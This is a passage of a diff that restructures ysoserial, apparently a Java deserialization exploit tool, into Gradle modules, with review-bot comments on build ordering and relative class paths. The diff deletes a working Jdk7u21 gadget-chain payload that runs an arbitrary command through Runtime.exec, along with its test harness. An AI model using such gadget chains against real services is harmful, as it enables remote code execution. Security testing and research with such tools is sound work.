-import java.util.HashMap;
-import java.util.LinkedHashSet;
-
-import javax.xml.transform.Templates;
-
-import ysoserial.payloads.annotation.Dependencies;
-import ysoserial.payloads.util.Gadgets;
-import ysoserial.payloads.util.PayloadRunner;
-import ysoserial.payloads.util.Reflections;
-
-import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
-
-/*
-
-Gadget chain that works against JRE 1.7u21 and earlier. Payload generation has
-the same JRE version requirements.
-
-See: https://gist.github.com/frohoff/24af7913611f8406eaf3
-
-Call tree:
-
-LinkedHashSet.readObject()
- LinkedHashSet.add()
- ...
- TemplatesImpl.hashCode() (X)
- LinkedHashSet.add()
- ...
- Proxy(Templates).hashCode() (X)
- AnnotationInvocationHandler.invoke() (X)
- AnnotationInvocationHandler.hashCodeImpl() (X)
- String.hashCode() (0)
- AnnotationInvocationHandler.memberValueHashCode() (X)
- TemplatesImpl.hashCode() (X)
- Proxy(Templates).equals()
- AnnotationInvocationHandler.invoke()
- AnnotationInvocationHandler.equalsImpl()
- Method.invoke()
- ...
- TemplatesImpl.getOutputProperties()
- TemplatesImpl.newTransformer()
- TemplatesImpl.getTransletInstance()
- TemplatesImpl.defineTransletClasses()
- ClassLoader.defineClass()
- Class.newInstance()
- ...
- MaliciousClass.()
- ...
- Runtime.exec()
- */
-
-@SuppressWarnings({ "rawtypes", "unchecked", "restriction" })
-@Dependencies()
-public class Jdk7u21 implements ObjectPayload {
-
- public Object getObject(final String command) throws Exception {
- final TemplatesImpl templates = Gadgets.createTemplatesImpl(command);
-
- String zeroHashCodeStr = "f5a5a608";
-
- HashMap map = new HashMap();
- map.put(zeroHashCodeStr, "foo");
-
- InvocationHandler tempHandler = (InvocationHandler) Reflections.getFirstCtor(Gadgets.ANN_INV_HANDLER_CLASS).newInstance(Override.class, map);
- Reflections.setFieldValue(tempHandler, "type", Templates.class);
- Templates proxy = Gadgets.createProxy(tempHandler, Templates.class);
-
- LinkedHashSet set = new LinkedHashSet(); // maintain order
- set.add(templates);
- set.add(proxy);
-
- Reflections.setFieldValue(templates, "_auxClasses", null);
- Reflections.setFieldValue(templates, "_class", null);
-
- map.put(zeroHashCodeStr, templates); // swap in real object
-
- return set;
- }
-
- public static void main(final String[] args) throws Exception {
- PayloadRunner.run(Jdk7u21.class, args);
- }
-
-}
diff --git a/src/test/java/ysoserial/Throwables.java b/src/test/java/ysoserial/Throwables.java
deleted file mode 100644
index 921e4938..00000000
--- a/src/test/java/ysoserial/Throwables.java
+++ /dev/null
@@ -1,8 +0,0 @@
-package ysoserial;
-
-public class Throwables {
- public static Throwable getInnermostCause(final Throwable t) {
- final Throwable cause = t.getCause();
- return cause == null || cause == t ? t : getInnermostCause(cause);
- }
-}
\ No newline at end of file
diff --git a/src/test/java/ysoserial/exploit/RMIRegistryExploitTest.java b/src/test/java/ysoserial/exploit/RMIRegistryExploitTest.java
deleted file mode 100755
index 8b90f193..00000000
--- a/src/test/java/ysoserial/exploit/RMIRegistryExploitTest.java
+++ /dev/null
@@ -1,18 +0,0 @@ -package ysoserial.exploit; - -import java.rmi.RemoteException; -import java.rmi.registry.LocateRegistry; -import java.rmi.registry.Registry; - -public class RMIRegistryExploitTest { - public static void createRegistry(int port) throws RemoteException { - Registry registry = LocateRegistry.createRegistry(port); - } - - public static void main(String[] args) throws RemoteException, InterruptedException { - String portStr = args.length > 0 && args[0] != null ? args[0] : "1099"; - int port = Integer.parseInt(portStr); - createRegistry(port); - while (true) Thread.sleep(1000); - } -} diff --git a/src/test/java/ysoserial/payloads/PayloadsTest.java b/src/test/java/ysoserial/payloads/PayloadsTest.java deleted file mode 100644 index b58d28d0..00000000 --- a/src/test/java/ysoserial/payloads/PayloadsTest.java +++ /dev/null 
@@ -1,108 +0,0 @@ -package ysoserial.payloads; - -import java.io.File; -import java.net.URL; -import java.net.URLClassLoader; -import java.util.Arrays; -import java.util.Set; -import java.util.concurrent.Callable; - -import org.jboss.shrinkwrap.resolver.api.maven.Maven; -import org.junit.Assert; -import org.junit.Test; -import org.junit.runner.RunWith; -import org.junit.runners.Parameterized; -import org.junit.runners.Parameterized.Parameters; - -import ysoserial.Serializer; -import ysoserial.Throwables; -import ysoserial.payloads.TestHarnessTest.ExecMockPayload; -import ysoserial.payloads.TestHarnessTest.NoopMockPayload; -import ysoserial.payloads.annotation.Dependencies; -import ysoserial.payloads.util.ClassFiles; -import ysoserial.secmgr.ExecCheckingSecurityManager; -import ysoserial.secmgr.ExecCheckingSecurityManager.ExecException; - -/* - * tests each of the parameterize Payload classes by using a mock SecurityManager that throws - * a special exception when an exec() attempt is made for more reliable detection; self-tests - * the harness for trivial pass and failure cases - -TODO: figure out better way to test exception behavior than comparing messages - */ -@SuppressWarnings({"restriction", "unused", "unchecked"}) -@RunWith(Parameterized.class) -public class PayloadsTest { - private static final String ASSERT_MESSAGE = "should have thrown " + ExecException.class.getSimpleName(); - - @Parameters(name = "payloadClass: {0}") - public static Class>[] payloads() { - Set> payloadClasses = ObjectPayload.Utils.getPayloadClasses(); - //SpringAop will only work if the pom.xml is change to used a old version of Spring - payloadClasses.removeAll(Arrays.asList(ExecMockPayload.class, NoopMockPayload.class, SpringAop.class)); - return payloadClasses.toArray(new Class[0]); - } - - private final Class> payloadClass; - - public PayloadsTest(Class> payloadClass) { - this.payloadClass = payloadClass; - } - - @Test - public void testPayload() throws Exception { - 
testPayload(payloadClass, new Class[0]); - } - - public static void testPayload(final Class> payloadClass, final Class[] addlClassesForClassLoader) throws Exception { - final String command = "hostname"; - final String[] deps = Dependencies.Utils.getDependencies(payloadClass); - ExecCheckingSecurityManager sm = new ExecCheckingSecurityManager(); - final byte[] serialized = sm.wrap(new Callable(){ - public byte[] call() throws Exception { - ObjectPayload payload = payloadClass.newInstance(); - final Object f = payload.getObject(command); - return Serializer.serialize(f); - }}); - - try { - Object deserialized = sm.wrap(new Callable(){ - public Object call() throws Exception { - return deserializeWithDependencies(serialized, deps, addlClassesForClassLoader); - } - }); - - Assert.fail(ASSERT_MESSAGE); // should never get here - } catch (Throwable e) { - // hopefully everything will reliably nest our ExecException - Throwable innerEx = Throwables.getInnermostCause(e); - Assert.assertEquals(ExecException.class, innerEx.getClass()); - Assert.assertEquals(command, ((ExecException) innerEx).getCmd()); - } - Assert.assertEquals(Arrays.asList(command), sm.getCmds()); - } - - @SuppressWarnings({ "unchecked" }) - private static Object deserializeWithDependencies(byte[] serialized, final String[] dependencies, final Class[] classDependencies) throws Exception { - File[] jars = dependencies.length > 0 ? 
Maven.resolver().resolve(dependencies).withoutTransitivity().asFile() : new File[0]; - URL[] urls = new URL[jars.length]; - for (int i = 0; i < jars.length; i++) { - urls[i] = jars[i].toURI().toURL(); - } - - URLClassLoader isolatedClassLoader = new URLClassLoader(urls, null) {{ - for (Class clazz : classDependencies) { - byte[] classAsBytes = ClassFiles.classAsBytes(clazz); - defineClass(clazz.getName(), classAsBytes, 0, classAsBytes.length); - } - byte[] deserializerClassBytes = ClassFiles.classAsBytes(ysoserial.Deserializer.class); - defineClass(ysoserial.Deserializer.class.getName(), deserializerClassBytes, 0, deserializerClassBytes.length); - - }}; - - Class deserializerClass = isolatedClassLoader.loadClass(ysoserial.Deserializer.class.getName()); - Callable deserializer = (Callable) deserializerClass.getConstructors()[0].newInstance(serialized); - final Object obj = deserializer.call(); - return obj; - } -} diff --git a/src/test/java/ysoserial/payloads/TestHarnessTest.java b/src/test/java/ysoserial/payloads/TestHarnessTest.java deleted file mode 100755 index 8c4c5316..00000000 --- a/src/test/java/ysoserial/payloads/TestHarnessTest.java +++ /dev/null 
@@ -1,66 +0,0 @@ -package ysoserial.payloads; - -import java.io.IOException; -import java.io.ObjectInputStream; -import java.io.Serializable; - -import org.hamcrest.CoreMatchers; -import org.junit.Assert; -import org.junit.Test; - -public class TestHarnessTest { - // make sure test harness fails properly - @Test - public void testHarnessExecFail() throws Exception { - try { - PayloadsTest.testPayload(NoopMockPayload.class, new Class[0]); - Assert.fail("should have failed"); - } catch (AssertionError e) { - Assert.assertThat(e.getMessage(), CoreMatchers.containsString("but was:")); - - } - } - - // make sure test harness fails properly - @Test - public void testHarnessClassLoaderFail() throws Exception { - try { - PayloadsTest.testPayload(ExecMockPayload.class, new Class[0]); - Assert.fail("should have failed"); - } catch (AssertionError e) { - Assert.assertThat(e.getMessage(), CoreMatchers.containsString("ClassNotFoundException")); - } - } - - // make sure test harness passes properly with trivial execution gadget - @Test - public void testHarnessExecPass() throws Exception { - PayloadsTest.testPayload(ExecMockPayload.class, new Class[] { ExecMockSerializable.class }); - } - - public static class ExecMockPayload implements ObjectPayload { - public ExecMockSerializable getObject(String command) throws Exception { - return new ExecMockSerializable(command); - } - } - - public static class NoopMockPayload implements ObjectPayload { - public Integer getObject(String command) throws Exception { - return 1; - } - } - - @SuppressWarnings("serial") - public static class ExecMockSerializable implements Serializable { - private final String cmd; - public ExecMockSerializable(String cmd) { this.cmd = cmd; } - - private void readObject(final ObjectInputStream ois) { - try { - Runtime.getRuntime().exec("hostname"); - } catch (IOException e) { - throw new RuntimeException(e); - } - } - } -} 
diff --git a/ysoserial-cli/build.gradle b/ysoserial-cli/build.gradle
new file mode 100644
index 00000000..f59487a5
--- /dev/null
+++ b/ysoserial-cli/build.gradle
@@ -0,0 +1,59 @@
+group 'ysoserial'
+version '1.0-SNAPSHOT'
+
+dependencies {
+ compile group: 'org.xeustechnologies', name: 'jcl-core', version: '2.7'
+
+ compile project(':ysoserial-core')
+}
+
+task copyLibs << {
+ //Regroup the jar need for each gadget in separated folders
+ rootProject.subprojects.each { subProject ->
+
+ if(subProject.name.startsWith("gadget-")) { //Export dependencies of gadget only
+ println("Copying libraries for the subproject "+subProject.name);
+ copy { //Dependencies minus the common ones
+ into "$buildDir/output/"+subProject.name
+ from subProject.configurations.compile - project(":ysoserial-cli").configurations.compile
+ }
+ copy { //Add the project itself (gadget code generation)
+ into "$buildDir/output/"+subProject.name
+ from subProject.jar.archivePath
+ }
+ }
+ }
+ //Common dependencies (unrelated to gadget code)
+ copy {
+ into "$buildDir/output/libs"
+ from configurations.compile
+ }
+ //JCL is merged in the final jar
+ copy {
+ from(zipTree("$buildDir/output/libs/jcl-core-2.7.jar"))
+ into("$buildDir/output/jcl-classes")
+ }
+}
+
+task createJar(dependsOn:[jar, copyLibs],type:Jar) {
+
+ manifest {
+ attributes(
+ "Implementation-Title": 'ysoserial',
+ "Implementation-Version": version,
+ "Main-Class": 'ysoserial.BootstrapMain'
+ )
+ }
+ classifier 'all'
+ destinationDir new File("$buildDir")
+
+ //Source code of the CLI
+ from sourceSets.main.output
+ //JCL library merged to the main jar
+ from "$buildDir/output/jcl-classes"
+
+ //Trigger the task createJar automatically when building ysoserial-cli
+ createJar.dependsOn assemble
+ build.dependsOn createJar
+
+}
diff --git a/ysoserial-cli/src/main/java/ysoserial/BootstrapMain.java b/ysoserial-cli/src/main/java/ysoserial/BootstrapMain.java
new file mode 100644
index 00000000..23f9a037
--- /dev/null
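Review bot: In `copyLibs` (ysoserial-cli/build.gradle) the copy from `subProject.jar.archivePath` runs without any declared dependency on the gadget subprojects' `jar` tasks, so unless the root build.gradle (not visible here) orders them, the gadget folders can be filled before the jars exist or with stale ones. Declaring those `jar` tasks as dependencies of `copyLibs` at configuration time would make the ordering explicit. The unpack step also hard-codes `jcl-core-2.7.jar`, which stops matching as soon as the `version: '2.7'` line is bumped; `from(zipTree(configurations.compile.find { it.name.startsWith('jcl-core') }))` keeps the two in step. These folders are what the CLI loads code from at run time, so a fully ordered, reproducible copy matters here.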
+++ b/ysoserial-cli/src/main/java/ysoserial/BootstrapMain.java
@@ -0,0 +1,35 @@
+package ysoserial;
+
+import org.xeustechnologies.jcl.JarClassLoader;
+import org.xeustechnologies.jcl.JclObjectFactory;
+import org.xeustechnologies.jcl.context.DefaultContextLoader;
+import ysoserial.payloads.ObjectPayload;
+import ysoserial.payloads.util.PayloadRunner;
+
+import java.io.BufferedInputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.lang.reflect.Method;
+import java.net.URL;
+import java.util.Arrays;
+import java.util.Map;
+
+public class BootstrapMain {
+ public static void main(String[] args) throws Exception {
+ JarClassLoader jcl = new JarClassLoader();
+ jcl.add("output/libs");
+
+ //TODO: Make the classpath selection dynamic based on the gadget selected
+ jcl.add("output/gadget-cc3");
+ jcl.add("output/gadget-cc4");
+
+ JclObjectFactory factory = JclObjectFactory.getInstance();
+ final Object generatePayload = factory.create(jcl, "ysoserial.GeneratePayload");
+
+ //Invoke main method
+ Method m = generatePayload.getClass().getDeclaredMethod("main",String[].class);
+ m.invoke(null,new Object[] { args });
+ }
+
+}
diff --git a/ysoserial-core/build.gradle b/ysoserial-core/build.gradle
new file mode 100644
index 00000000..0412e3d7
--- /dev/null
+++ b/ysoserial-core/build.gradle
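Review bot: `BootstrapMain.main` adds `output/libs`, `output/gadget-cc3` and `output/gadget-cc4` as relative paths, so they are presumably resolved against the process working directory rather than against the location of the jar. Started from any other directory, the tool either fails to find `ysoserial.GeneratePayload` or loads whatever jars sit in an `output/` folder there, which is an untrusted search path for code that is then executed. Resolving the three folders against the jar's own location (this needs `java.io.File`) removes that dependence; ysoserial-cli/build.gradle suggests the jar and `output/` both live under `$buildDir`, but confirm the layout. Separately, most imports in this new file (`DefaultContextLoader`, `ObjectPayload`, `PayloadRunner`, the `java.io` stream classes, `URL`, `Arrays`, `Map`) are unused and can be dropped.

```java
    public static void main(String[] args) throws Exception {
        // Anchor the library folders to the jar's directory, not the caller's working directory
        File baseDir = new File(BootstrapMain.class.getProtectionDomain()
                .getCodeSource().getLocation().toURI()).getParentFile();
        JarClassLoader jcl = new JarClassLoader();
        jcl.add(new File(baseDir, "output/libs").getPath());
        jcl.add(new File(baseDir, "output/gadget-cc3").getPath());
        jcl.add(new File(baseDir, "output/gadget-cc4").getPath());
        // … unchanged: JclObjectFactory lookup and reflective call to GeneratePayload.main …
```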
@@ -0,0 +1,21 @@ +group 'ysoserial' +version '1.0-SNAPSHOT' + +apply plugin: 'java' + +sourceCompatibility = 1.7 + +repositories { + mavenCentral() +} + +dependencies { + testCompile group: 'junit', name: 'junit', version: '4.12' + testCompile group: 'org.mockito', name: 'mockito-core', version : '1.10.19' + testCompile group: 'com.github.stefanbirkner', name: 'system-rules', version : '1.8.0' + + compile group: 'org.reflections', name: 'reflections', version: '0.9.9' + //compile group: 'org.jboss.shrinkwrap.resolver', name: 'shrinkwrap-resolver-depchain', version: '2.1.1' + compile group: 'org.javassist', name: 'javassist', version: '3.19.0-GA' + +} diff --git a/src/main/java/ysoserial/Deserializer.java b/ysoserial-core/src/main/java/ysoserial/Deserializer.java old mode 100755 new mode 100644 similarity index 100% rename from src/main/java/ysoserial/Deserializer.java rename to ysoserial-core/src/main/java/ysoserial/Deserializer.java diff --git a/src/main/java/ysoserial/GeneratePayload.java b/ysoserial-core/src/main/java/ysoserial/GeneratePayload.java similarity index 100% rename from src/main/java/ysoserial/GeneratePayload.java rename to ysoserial-core/src/main/java/ysoserial/GeneratePayload.java index e6e41dfc..4ffa4d8f 100644 --- a/src/main/java/ysoserial/GeneratePayload.java +++ b/ysoserial-core/src/main/java/ysoserial/GeneratePayload.java @@ -1,5 +1,9 @@ package ysoserial; +import ysoserial.payloads.ObjectPayload; +import ysoserial.payloads.ObjectPayload.Utils; +import ysoserial.payloads.annotation.Dependencies; + import java.io.PrintStream; import java.util.ArrayList; import java.util.Arrays; @@ -7,10 +11,6 @@ import java.util.Comparator; import java.util.List; -import ysoserial.payloads.ObjectPayload; -import ysoserial.payloads.ObjectPayload.Utils; -import ysoserial.payloads.annotation.Dependencies; - @SuppressWarnings("rawtypes") public class GeneratePayload { 
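Review bot: The commented-out `shrinkwrap-resolver-depchain` line in ysoserial-core/build.gradle is left without explanation, while the same patch deletes PayloadsTest, the test that used the ShrinkWrap Maven resolver to deserialize each payload in an isolated class loader. If that test is meant to be ported to the per-gadget layout, say so next to the line, e.g. `// TODO: re-enable together with PayloadsTest once gadget modules have tests`; otherwise remove the line. As far as this patch shows, the module still declares junit, mockito and system-rules as `testCompile` dependencies but no longer carries a test that exercises the payload classes.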
diff --git a/src/main/java/ysoserial/Serializer.java b/ysoserial-core/src/main/java/ysoserial/Serializer.java old mode 100755 new mode 100644 similarity index 100% rename from src/main/java/ysoserial/Serializer.java rename to ysoserial-core/src/main/java/ysoserial/Serializer.java diff --git a/src/main/java/ysoserial/payloads/ObjectPayload.java b/ysoserial-core/src/main/java/ysoserial/payloads/ObjectPayload.java similarity index 99% rename from src/main/java/ysoserial/payloads/ObjectPayload.java rename to ysoserial-core/src/main/java/ysoserial/payloads/ObjectPayload.java index 3a8133f0..3a969f22 100644 --- a/src/main/java/ysoserial/payloads/ObjectPayload.java +++ b/ysoserial-core/src/main/java/ysoserial/payloads/ObjectPayload.java @@ -1,11 +1,10 @@ package ysoserial.payloads; -import java.util.Set; - import org.reflections.Reflections; - import ysoserial.GeneratePayload; +import java.util.Set; + public interface ObjectPayload { /* * return armed payload object to be serialized that will execute specified diff --git a/src/main/java/ysoserial/payloads/annotation/Dependencies.java b/ysoserial-core/src/main/java/ysoserial/payloads/annotation/Dependencies.java similarity index 100% rename from src/main/java/ysoserial/payloads/annotation/Dependencies.java rename to ysoserial-core/src/main/java/ysoserial/payloads/annotation/Dependencies.java diff --git a/src/main/java/ysoserial/payloads/util/ClassFiles.java b/ysoserial-core/src/main/java/ysoserial/payloads/util/ClassFiles.java similarity index 100% rename from src/main/java/ysoserial/payloads/util/ClassFiles.java rename to ysoserial-core/src/main/java/ysoserial/payloads/util/ClassFiles.java diff --git a/src/main/java/ysoserial/payloads/util/Gadgets.java b/ysoserial-core/src/main/java/ysoserial/payloads/util/Gadgets.java similarity index 98% rename from src/main/java/ysoserial/payloads/util/Gadgets.java rename to ysoserial-core/src/main/java/ysoserial/payloads/util/Gadgets.java index ad6b18c6..c7546d76 100644 
--- a/src/main/java/ysoserial/payloads/util/Gadgets.java +++ b/ysoserial-core/src/main/java/ysoserial/payloads/util/Gadgets.java @@ -1,6 +1,15 @@ package ysoserial.payloads.util; -import static com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET; +import com.sun.org.apache.xalan.internal.xsltc.DOM; +import com.sun.org.apache.xalan.internal.xsltc.TransletException; +import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; +import com.sun.org.apache.xml.internal.serializer.SerializationHandler; +import javassist.ClassClassPath; +import javassist.ClassPool; +import javassist.CtClass; import java.io.Serializable; import java.lang.reflect.Array; @@ -9,22 +18,12 @@ import java.util.HashMap; import java.util.Map; -import javassist.ClassClassPath; -import javassist.ClassPool; -import javassist.CtClass; - -import com.sun.org.apache.xalan.internal.xsltc.DOM; -import com.sun.org.apache.xalan.internal.xsltc.TransletException; -import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; -import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; -import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; -import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; -import com.sun.org.apache.xml.internal.serializer.SerializationHandler; +import static com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET; /* * utility generator functions for common jdk-only gadgets */ -@SuppressWarnings("restriction") +@SuppressWarnings({"deprecation","restriction"}) public class Gadgets { static { // special case for using TemplatesImpl gadgets with a SecurityManager enabled 
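Review bot: The widened `@SuppressWarnings({"deprecation","restriction"})` on `Gadgets` silences deprecation warnings for the whole class, and the hunk does not show which call needs it. A class-wide suppression also hides any deprecated API added to this utility later; it reads better on the one member that requires it, with a comment naming the API, e.g. `@SuppressWarnings("deprecation") // <deprecated call> has no replacement on the targeted JRE`. The same applies to the class-level `@SuppressWarnings("deprecation")` added to `DelegateSecurityManager` further down in this patch. Both class bodies continue outside their hunks, so the deprecated members themselves are not visible here.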
diff --git a/src/main/java/ysoserial/payloads/util/PayloadRunner.java b/ysoserial-core/src/main/java/ysoserial/payloads/util/PayloadRunner.java similarity index 93% rename from src/main/java/ysoserial/payloads/util/PayloadRunner.java rename to ysoserial-core/src/main/java/ysoserial/payloads/util/PayloadRunner.java index 7d0ae39d..a83ea22d 100644 --- a/src/main/java/ysoserial/payloads/util/PayloadRunner.java +++ b/ysoserial-core/src/main/java/ysoserial/payloads/util/PayloadRunner.java @@ -1,14 +1,13 @@ package ysoserial.payloads.util; -import java.util.concurrent.Callable; - -import ysoserial.Deserializer; import ysoserial.Serializer; -import static ysoserial.Deserializer.deserialize; -import static ysoserial.Serializer.serialize; import ysoserial.payloads.ObjectPayload; import ysoserial.secmgr.ExecCheckingSecurityManager; +import java.util.concurrent.Callable; + +import static ysoserial.Deserializer.deserialize; + /* * utility class for running exploits locally from command line */ diff --git a/src/main/java/ysoserial/payloads/util/PrintUtil.java b/ysoserial-core/src/main/java/ysoserial/payloads/util/PrintUtil.java similarity index 98% rename from src/main/java/ysoserial/payloads/util/PrintUtil.java rename to ysoserial-core/src/main/java/ysoserial/payloads/util/PrintUtil.java index cf551e49..72c7d545 100644 --- a/src/main/java/ysoserial/payloads/util/PrintUtil.java +++ b/ysoserial-core/src/main/java/ysoserial/payloads/util/PrintUtil.java @@ -3,7 +3,6 @@ import java.io.Serializable; import java.lang.reflect.Array; import java.lang.reflect.Field; -import java.lang.reflect.Method; import java.lang.reflect.Modifier; import java.util.ArrayList; import java.util.List; diff --git a/src/main/java/ysoserial/payloads/util/Reflections.java b/ysoserial-core/src/main/java/ysoserial/payloads/util/Reflections.java similarity index 100% rename from src/main/java/ysoserial/payloads/util/Reflections.java rename to ysoserial-core/src/main/java/ysoserial/payloads/util/Reflections.java 
diff --git a/src/main/java/ysoserial/secmgr/DelegateSecurityManager.java b/ysoserial-core/src/main/java/ysoserial/secmgr/DelegateSecurityManager.java old mode 100755 new mode 100644 similarity index 99% rename from src/main/java/ysoserial/secmgr/DelegateSecurityManager.java rename to ysoserial-core/src/main/java/ysoserial/secmgr/DelegateSecurityManager.java index d24cebcd..22489d90 --- a/src/main/java/ysoserial/secmgr/DelegateSecurityManager.java +++ b/ysoserial-core/src/main/java/ysoserial/secmgr/DelegateSecurityManager.java @@ -4,6 +4,7 @@ import java.net.InetAddress; import java.security.Permission; +@SuppressWarnings("deprecation") public class DelegateSecurityManager extends SecurityManager { private SecurityManager securityManager; diff --git a/src/main/java/ysoserial/secmgr/ExecCheckingSecurityManager.java b/ysoserial-core/src/main/java/ysoserial/secmgr/ExecCheckingSecurityManager.java similarity index 100% rename from src/main/java/ysoserial/secmgr/ExecCheckingSecurityManager.java rename to ysoserial-core/src/main/java/ysoserial/secmgr/ExecCheckingSecurityManager.java diff --git a/src/main/java/ysoserial/secmgr/ThreadLocalSecurityManager.java b/ysoserial-core/src/main/java/ysoserial/secmgr/ThreadLocalSecurityManager.java old mode 100755 new mode 100644 similarity index 100% rename from src/main/java/ysoserial/secmgr/ThreadLocalSecurityManager.java rename to ysoserial-core/src/main/java/ysoserial/secmgr/ThreadLocalSecurityManager.java